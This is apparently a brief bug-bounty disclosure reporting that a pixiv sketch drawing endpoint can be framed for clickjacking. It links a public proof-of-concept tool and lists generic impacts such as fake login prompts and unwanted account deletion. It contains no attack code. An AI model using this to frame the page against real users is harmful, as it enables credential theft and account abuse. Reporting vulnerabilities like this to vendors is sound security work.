clickjacing can lead to account takeover

hello team . while testing the site we found an endpoint call https://sketch.pixiv.net/draw {F2626044} using it we can trick the user to fake login with the use of clickjackingpoc : https://github.com/shifa123/clickjackingpoc as poc shown : {F2626057} ## Impact Users are tricked into performing all sorts of unintended actions are such as typing in the password, clicking on ‘Delete my account’ button, liking a post, deleting a post, commenting on a blog. In other words all the actions that a normal user can do on a legitimate website can be done using clickjacking.